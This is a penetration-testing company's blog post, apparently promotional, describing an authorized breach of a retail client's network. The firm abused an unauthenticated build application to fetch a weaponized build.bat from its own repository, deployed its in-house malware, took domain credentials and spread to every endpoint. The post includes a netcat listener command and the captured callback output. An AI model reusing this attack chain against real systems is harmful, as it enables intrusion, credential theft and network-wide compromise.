Search
Close this search box.
The Truth About Breaching Retail Networks

The Truth About Breaching Retail Networks

Breaching Retail Networks

How we breached a retail network using our manual penetration testing methodology

We recently delivered an Advanced Persistent Threat  (APT) Penetration Test to one of our customers. People who know us know that when we say APT we’re not just using buzz words.  Our APT services maintain a 98% success rate at compromise while our unrestricted methodology maintains a 100% success at compromise to date.  (In fact we offer a challenge to back up our stats.  If we don’t penetrate with our unrestricted methodology then your test is free.)  Lets begin the story about a large retail customer that wanted our APT services.
When we deliver covert engagements we don’t use the everyday and largely ineffective low and slow methodology.  Instead, we use a realistic offensive methodology that incorporates distributed scanning, the use of custom tools, zero-day malware (RADON) among other things.  We call this methodology Real Time Dynamic Testing™ because it’s delivered in real time and is dynamic.  At the core of our methodology are components normally reserved for vulnerability research and exploit development.  Needless to say, our methodology has teeth.
Our customer (the target) wanted a single /23 attacked during the engagement. The first thing that we did was to perform reconnaissance against the /23 so that we knew what we were up against.  Reconnaissance in this case involved distributed scanning and revealed a large number of http and https services running on 149 live targets.  The majority of the pages were uninteresting and provided static content while a few provided dynamic content.
While evaluating the dynamic pages we came across one that was called Make Boss. The application was appeared to be custom built for the purpose of managing software builds. What really snagged our attention was that this application didn’t support any sort of authentication.  Instead anyone who visited the page had access to use the application.
We quickly noticed that the application allowed us to generate new projects.  Then we noticed that we could point those new projects at any SVN or GIT repo local or remote.  We also identified a hidden questionable page named “list-dir.php” that enabled us to list the contents of any directory that the web server had permission to access.
We used “list-dir.php” to enumerate local users by guessing the contents of “C:\document~1” (Documents and Settings folder). In doing so we identified useful directories like “C:\MakeBoss\Source” and “C:\MakeBoss\Compiled”.  The existence of these directories told us that projects were built on and fetched from same server.
The next step was to see if in fact we could get the Make Boss application to establish a connection with a repository that we controlled.  To do this we setup an external listener using netcat at our lab .  Then we configured a new project called “_Netragard” in Make Boss in such a way that it would connect to our listener. The test was a success as is shown by the redacted output below.

[titon@netragard:~]$ nc -l -p 8888 -v
listening on [any] 8888 …
xx.xx.xx.xx: inverse host lookup failed: Unknown server error : Connection timed out
connect to [xx.xx.xx.xx] from (UNKNOWN) [xx.xx.xx.xx] 1028
OPTIONS / HTTP/1.1
Host: lab1.netragard.com:8888
User-Agent: SVN/1.6.4 (r38063) neon/0.28.2
Keep-Alive:
Connection: TE, Keep-Alive
TE: trailers
Content-Type: text/xml
Accept-Encoding: gzip
DAV: https://subversion.tigris.org/xmlns/dav/svn/depth
DAV: https://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: https://subversion.tigris.org/xmlns/dav/svn/log-revpropsContent-Length: 104
Accept-Encoding: gzip
 
<?xml version=”1.0″ encoding=”utf-8″?><D:options xmlns:D=”DAV:”><D:activity-collection-set/></D:options>

With communications verified we setup a real instance of SVN and created a weaponized build.bat file.  We selected the build.bat because we knew that Make Boss would execute the build.bat server-side and if done right we could use it to infect the system. (A good reference for setting up subversion can be found here  https://subversion.apache.org/quick-start).  Our initial attempts at getting execution failed due to file system permissions.  We managed to get successful execution of our build.bat by changing our target directory to “C:\TEMP” rather than working from the standard webserver directories.
With execution capabilities verified we modified our build.bat file so that it would deploy RADON (our home-grown 0-day pseudo-malware).  We used Make Boss to fetch and run our weaponized build.bat, which in turn infected the server running the Make Boss application.  Within seconds of infection our Command & Control server received a connection from the Make Boss server.  This represented our first point of penetration.
A note about RADON…
RADON is “safe” as far as malware goes because each strand is built with a pre-defined expiration date.  During this engagement RADON was set to expire 5 days after strand generation.  When RADON expires it quietly and cleanly self-destructs leaving the infected system in its original state which is more than what can be said for other “whitehat” frameworks (like Metasploit, etc).
RADON is also unique in that it’s designed for our highest-threat engagements (nation-state style).  By design RADON will communicate over both known and unknown covert channels.  Known channels are used for normal operation while covert channels are used for more specialized engagements.  All variants of RADON can be switched from known to covert and visa-versa from the Command & Control server.
Finally, it’s almost impossible to disrupt communication between RADON and its Command & Control center.  This is in part because of the way that RADON leverages key protocols that all networks depend on to operate.  Because of this, disrupting RADON’s covert channels would also disrupt all network functionality.
Back to the hack…
With the system infected by RADON we were able to take administrative control of the Make Boss server.  From there we identified domain administrator credentials that the server was happy to relinquish. We used those credentials to authenticate to and extract all current and historical passwords from the domain controller.   Then we used one of our specialized GPU password cracking machines to process the hashes and deliver us the keys to the kingdom.
With that accomplished we had established dominant network position. From this position we were able to propagate RADON to all endpoints and affect an irrecoverable network compromise.  Irrecoverable if we were the bad guys of course, but luckily we’re the good guys and our customer recovered just fine.  Never the less we had access to everything including but not limited to desktops, points of sale, web servers, databases, network devices, etc.
Not surprisingly our customers managed security service provider didn’t detect any of our activity, not even the mass infection.  They did however detect what we did next…
As a last step and to satisfy our customer we ran two different popular vulnerability scanners.  These are the same scanners that most penetration testing vendors rely on to deliver their services.  One of the scanners is more network centric and the other combines network and web application scanning.  Neither of the scanners identified a single viable vulnerability despite the existence of the (blatantly obvious) one that we exploited above.  The only things that were reported were informational findings like “port 80 open”, “deprecated SSL”, etc.
It’s really important to consider this when thinking about the breaches suffered by businesses like Hannaford, Sony, Target, Home Depot and so many.  If the penetration tests that you receive are based on the product of vulnerability scanners and those scanners fail to detect the most obvious vulnerabilities then where does that leave you?  Don’t be fooled by testers that promise to deliver “manual penetration tests” either.  In most cases they just vet scan reports and call the process of vetting “manual testing” which it isn’t.

Blog Posts